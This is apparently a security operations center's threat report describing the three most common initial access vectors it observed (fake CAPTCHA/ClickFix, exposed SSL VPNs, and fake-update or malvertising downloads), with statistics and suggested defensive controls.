Stop Them Before They Start: Top Threats in the Trenches, and How to Prevent Them
Vertical Analysis
Since January, attacks have been observed across 24 verticals worldwide.
Top 3 Initial Access Vectors
While analyzing observed incidents, clear patterns begin to emerge, with 80% of initial access vectors falling into these three categories.
Fake Captcha/ClickFix Attacks
While social engineering attacks have been around since the dawn of the internet and used against private individuals and companies alike, some new techniques have become popular for threat actors and just as effective. These attacks, tracked as FAKE CAPTCHA and CLICKFIX, accounted for about 45% of attacks that resulted in an on prem compromise as seen by Blackpoint’s SOC.
These attacks masquerade as antibot Captchas. Instead of standard tasks, FAKE CAPTCHAs will require a user to copy a malicious command and paste it into a Windows Run Dialogue box by running Win + R.
These attacks rely on a user having permission to access the Windows Run Dialogue box and executing commands. This subverts standard methods of social engineering-based malware delivery, making it less likely for traditional antiviruses to detect it prior to payload delivery and execution. Additionally, users have not been trained on this method of social engineering, making it less likely for a user to identify the attack.
SSL VPN Compromise
The SOC routinely observes valid account compromise (MITRE ID – T1078) sourcing from a publicly exposed VPN, with a publicly exposed VPN accounting for 30% of initial access vectors resulting in an on premises compromise. There are several benefits to the adversary by using this method of access.
- Quieter method of intrusion. Logging in via an established method of entry into an environment will require a higher standard of detection and containment ability within an environment.
- Edge device software commonly has critical vulnerabilities or has overly permissive configurations, allowing adversaries to exploit the software and gain access to an environment.
- Edge devices are the critical gatekeepers between internal networks and the internet making them attractive targets for threat actors. These devices manage and filter traffic, enforce security policies, and often provide remote access capabilities making them high-value targets for threat actors. Edge devices often operate with elevated privileges and are typically exposed to the internet. These devices are frequently targeted via vulnerabilities, exposed devices/portals, or misconfigurations.
- Blackpoint’s APG has sent out 71 notices to partners since the beginning of January regarding these types of vulnerabilities. These vulnerabilities are known to be favored by several ransom groups. Akira Ransomware, active since 2023, is one of the most well-known operations targeting SSL VPN appliances. The group frequently targets these for initial access, persistence, and defense evasion. Blackpoint SOC has been tracking an increase in exploitation of SonicWall devices by the Akira ransom gang, who attacked numerous organizations through August and September.
How do I know if my VPN is exposed?
- Take the public IP of your machine (which will likely match your network, make sure to grab the IP while on the corporate network vs your home network)
- Go to a scanner (website or CLI works, easy websites include Shodan or Censys)
- Insert the public IP. The results will show you what services are reachable by the public internet.
- Publicly exposed VPN login pages will point to a login webapp, often matching or being consistent with “https://
: /remote/login” - Ideally, nothing is accessible.
If there is something available to the public internet, it will show in the results.
Malicious Downloads
This category primarily involved activity such as FAKEUPDATES, user initiated malware download, or otherwise suspicious tool download. This made up 5% percent of initial access.
FAKEUPDATES
19% of the malicious downloads seen within the Blackpoint SOC were related to FAKEUPDATES, a form of malware specifically named to resemble a software update.
The bulk of these incidents focus around fake browser updates, such as Google Chrome, Edge, or Firefox. This tricks a user into thinking that they’re updating their browser, when in fact they are running malware.
The most common payload associated with this activity is SocGholish, a loader malware that sources from legitimate but compromised sites. Malicious JavaScript performs initial checks to verify the host is one which the attacker wants to infect. If these checks pass, the FAKEUPDATE is displayed to the user for download.
SocGholish has been linked to several groups, including Gold Drake, Evil Corp, UNC2165, and Mustard Tempest . The loader has been connected to the deployment of remote access trojans (RATs) and the deployment of several ransomware variants, including HIVE, LOCKBIT, and Wasted Locker.
In this way, one can observe how easy it is to infect a host with SocGholish, and the devastating consequences that come from an undeterred infection.
A Quick Note on Malvertising
Blackpoint SOC has seen an influx of malvertising campaigns focused on distributing trojanized versions of common administrator tools, such as PuTTy. Threat actors pay for ads, forcing their version above the legitimate version in search engine results, making it more likely for users, commonly administrators, to download and use their malicious version.
This has several benefits above malware delivery to standard users. First, the users that would commonly use these tools are more likely to be administrators in an environment, making their account more valuable, as it likely has additional access and permissions that a standard user might not. Second, as it is an administrator, initial reconnaissance or information gathering may not appear suspicious, as the activity can be written off as standard administrative activities, if alerted on by traditional AV. Finally, otherwise suspicious activity performed by the trojanized version of the administrative software is more likely to fly under the radar due to the parent process name. In the instance of trojanized PuTTY, suspicious file transfer activity has a higher likelihood of being overlooked due to the user context and known use case of the program.
Suggested Security Controls:
- Audit Account Privileges- prevent user ability to install software, access cmd, PowerShell, and the Windows Run dialogue box.
- Educate users on FakeCaptcha and ClickFix attacks – Link our blog posts here.
- Regulate access to web app VPN login pages, minimize exposed login pages/services.
- Ensure edge device software is regularly updated.
- Ensure any tools downloaded source from known and legitimate websites.